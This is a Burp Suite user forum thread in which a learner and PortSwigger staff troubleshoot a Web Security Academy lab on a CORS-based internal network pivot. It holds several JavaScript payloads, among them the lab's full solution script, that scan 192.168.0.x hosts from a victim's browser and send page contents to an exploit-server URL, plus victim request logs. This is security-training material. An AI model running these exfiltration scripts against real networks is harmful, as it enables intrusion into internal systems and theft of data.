Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

CORS vulnerability with internal network pivot attack

paulorz | Last updated: Mar 18, 2024 04:55PM UTC

Hi, how is everyone doing? I am writing this post because I am not being able to advance from the first step on this lab. I am using the server provided with the lab (not Collaborator, as I don't have the Professional version) and Mozilla Firefox (even though, this should not matter, since the problem I am having is when delivering the exploit to the victim). I am able to aquire the target's IP Address, but the problem arises somewhere around the response.text() POC or the encodeURIComponent. This is the script I am using (I also tried the solution provided on the lab but could not solve it, either). I have stripped it of the for loop since that part works correctly, the x is replacing the number obtained previously via the for loop: <script> fetch('http://192.168.0.x:8080') .then(response => response.text()) .then(text => fetch('http://exploit-0a8e0056034383d0837c4649011c00e8.exploit-server.net/exploit?data='+encodeURIComponent(text))) </script> Any help or insight will be greatly appreciated :) Thanks for the labs, they are amazing resources :D

Ben, PortSwigger Agent | Last updated: Mar 19, 2024 02:16PM UTC

Hi, Just to clarify, which step of the solution are you referring to?

paulorz | Last updated: Mar 19, 2024 03:44PM UTC

This one: Step 1 First we need to scan the local network for the endpoint. Replace $collaboratorPayload with your own Collaborator payload or exploit server URL. Enter the following code into the exploit server. Click store then "Deliver exploit to victim". Inspect the log or the Collaborator interaction and look at the code parameter sent to it. <script> var q = [], collaboratorURL = 'http://$collaboratorPayload'; for(i=1;i<=255;i++) { q.push(function(url) { return function(wait) { fetchUrl(url, wait); } }('http://192.168.0.'+i+':8080')); } for(i=1;i<=20;i++){ if(q.length)q.shift()(i*100); } function fetchUrl(url, wait) { var controller = new AbortController(), signal = controller.signal; fetch(url, {signal}).then(r => r.text().then(text => { location = collaboratorURL + '?ip='+url.replace(/^http:\/\//,'')+'&code='+encodeURIComponent(text)+'&'+Date.now(); })) .catch(e => { if(q.length) { q.shift()(wait); } }); setTimeout(x => { controller.abort(); if(q.length) { q.shift()(wait); } }, wait); } </script> Using the exploit server provided with the lab, and through testing the code by parts, I am able to get the IP address of the victim, but I am not able to follow through with the rest of the data that I am supposed to obtain. Through sending the code by parts, I could isolate that the problem is in the response.test() or the encodeURIComponent(text)

Ben, PortSwigger Agent | Last updated: Mar 20, 2024 02:23PM UTC

Hi, Thank you for the confirmation. We will take a look into this lab and get back to you.

Ben, PortSwigger Agent | Last updated: Mar 21, 2024 01:15PM UTC

Hi, Running through this lab there do appear to be some issues using the exploit server to try and solve it (using the collaborator server seems to work as expected). Let me discuss this with the Web Academy team and get back to you.

paulorz | Last updated: Mar 21, 2024 01:37PM UTC

Thanks for the quick reply. Hope you can find a solution without going through much trouble ^-^

Ben, PortSwigger Agent | Last updated: Mar 22, 2024 09:31AM UTC

Hi, We do think there is something slightly odd with the written solution when using the exploit server. If you try the following for the first step, does this then return the IP address that is required? <script> for (let i = 1; i < 256; i++) { fetch(`http://192.168.0.${i}:8080/`) .then(r => fetch(`http://<EXPLOIT-SERVER-URL>?${r.url}`)) .catch(e => {}); } </script>

paulorz | Last updated: Mar 22, 2024 11:52AM UTC

Yes. When only probbing for the IP address, there is no problem. The problem arises when trying to do the response.text(), i believe (i have had to use the encodeURIComponent in other labs and I don't think thats being problematic).

paulorz | Last updated: Mar 22, 2024 12:13PM UTC

Adding information: I tried again with your same exact code. The results where the same as when I did it with the code I tried when trying to solve the lab. If I try to access the response with this code: <script> fetch(`http://192.168.0.109:8080/`) .then(r => fetch(`http://exploit-0a4100b70411589580ee7f6301710059.exploit-server.net?${encodeURIComponent(r)}`)) .catch(e => {}); </script> I get: 10.0.4.88 2024-03-22 12:06:34 +0000 "GET /exploit/ HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 10.0.4.88 2024-03-22 12:06:34 +0000 "GET /?%5Bobject%20Response%5D HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" If I try to stringify, i get an empty {}: <script> fetch(`http://192.168.0.109:8080/`) .then(r => fetch(`http://exploit-0a4100b70411589580ee7f6301710059.exploit-server.net?${encodeURIComponent(JSON.stringify(r))}`)) .catch(e => {}); </script> 10.0.4.88 2024-03-22 12:07:35 +0000 "GET /exploit/ HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 10.0.4.88 2024-03-22 12:07:35 +0000 "GET /?%7B%7D HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" And if I try to toString() it, I get: 10.0.4.88 2024-03-22 12:12:47 +0000 "GET /exploit/ HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 10.0.4.88 2024-03-22 12:12:47 +0000 "GET /?%5Bobject%20Response%5D HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"

Ben, PortSwigger Agent | Last updated: Mar 25, 2024 08:03AM UTC

Hi, We actually believe there is a fair amount wrong with this lab in its current form and the plan is now to disable it until such a time as we can get it working for users that use both the Collaborator and the exploit server.

paulorz | Last updated: Mar 25, 2024 10:35AM UTC

Oh, well! Thanks for the help! If I can help you with anything just reach out to me ^-^

mhg | Last updated: Apr 01, 2024 09:01PM UTC

use .substring() javascript method --> get a part of text with the fetch request encodeURIComponent(r.substring(500,800)) // something like this.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.